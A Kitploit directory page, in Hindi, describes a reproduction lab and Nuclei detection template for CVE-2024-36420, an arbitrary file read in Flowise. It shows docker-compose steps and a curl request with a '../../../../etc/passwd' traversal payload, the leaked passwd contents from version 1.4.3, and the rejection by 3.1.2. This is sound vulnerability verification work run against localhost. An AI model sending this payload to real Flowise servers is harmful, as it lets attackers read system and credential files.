Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
POC_CVE-2024-36420 — CVE-2024-36420 के लिए स्थानीय पुनरुत्पादन प्रयोगशाला और Nuclei टेम्पलेट, जो Flowise में अस्वच्छित fileName पैरामीटर के माध्यम से एक मनमाना फ़ाइल पढ़ने की कमजोरी है। यह असुरक्षित (1.4.3) और पैच किए गए (3.1.2) व्यवहार की पुष्टि करता है। | Kitploit
उपकरण/GitHubGitHub/fineman999/poc_cve-2024-36420
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंगलर्निंग और शिक्षालैब और अभ्यास
GitHubfineman999/poc_cve-2024-36420

POC_CVE-2024-36420

CVE-2024-36420 के लिए स्थानीय पुनरुत्पादन प्रयोगशाला और Nuclei टेम्पलेट, जो Flowise में अस्वच्छित fileName पैरामीटर के माध्यम से एक मनमाना फ़ाइल पढ़ने की कमजोरी है। यह असुरक्षित (1.4.3) और पैच किए गए (3.1.2) व्यवहार की पुष्टि करता है।

रिपॉजिटरी देखें
124 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

POC_CVE-2024-36420

CVE-2024-36420 से प्रभावित Flowise के लिए स्थानीय पुनरुत्पादन प्रयोगशाला और nuclei टेम्पलेट ड्राफ्ट।

सारांश

CVE-2024-36420 Flowise में एक मनमाना फ़ाइल पढ़ने की भेद्यता है, जो fileName बॉडी पैरामीटर के अशोधित उपयोग के कारण होती है:

  • POST /api/v1/openai-assistants-file

इस प्रयोगशाला का उपयोग निम्नलिखित को मान्य करने के लिए किया गया था:

  • flowiseai/flowise:1.4.3 पर असुरक्षित व्यवहार
  • नए flowiseai/flowise:3.1.2 पर अस्वीकृत व्यवहार

संदर्भ

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-36420
  • GitHub Security Lab: https://securitylab.github.com/advisories/GHSL-2023-232_GHSL-2023-234_Flowise/

फ़ाइलें

  • docker-compose.yml
  • docker-compose.latest.yml
  • CVE-2024-36420.yaml

असुरक्षित परीक्षण

Flowise 1.4.3 प्रारंभ करें:

docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise

मैन्युअल सत्यापन:

curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

देखी गई असुरक्षित प्रतिक्रिया:

HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...

नए संस्करण नियंत्रण

नया Flowise 3.1.2 प्रारंभ करें:

docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise

मैन्युअल सत्यापन:

curl -i \
  -X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
  -H 'Content-Type: application/json' \
  -d '{"fileName":"../../../../etc/passwd"}'

देखी गई नए संस्करण की प्रतिक्रिया:

HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}

Nuclei

टेम्पलेट मान्य करें:

nuclei -duc -validate -t CVE-2024-36420.yaml

असुरक्षित लक्ष्य पर चलाएं:

nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml

अपेक्षित व्यवहार:

  • 1.4.3: मेल खाता है
  • 3.1.2: मेल नहीं खाता

नोट्स

  • यह संस्करण अंतर स्वीकार्य है क्योंकि यह रिपॉजिटरी केवल देखे गए व्यवहार का दावा करती है:
    • 1.4.3 पर असुरक्षित
    • 3.1.2 पर अस्वीकृत
  • यह सटीक पैच किए गए संस्करण सीमा का दावा नहीं करती।
  • कोई वास्तविक दुनिया के लक्ष्य का उपयोग नहीं किया गया।
टूल डाउनलोड करें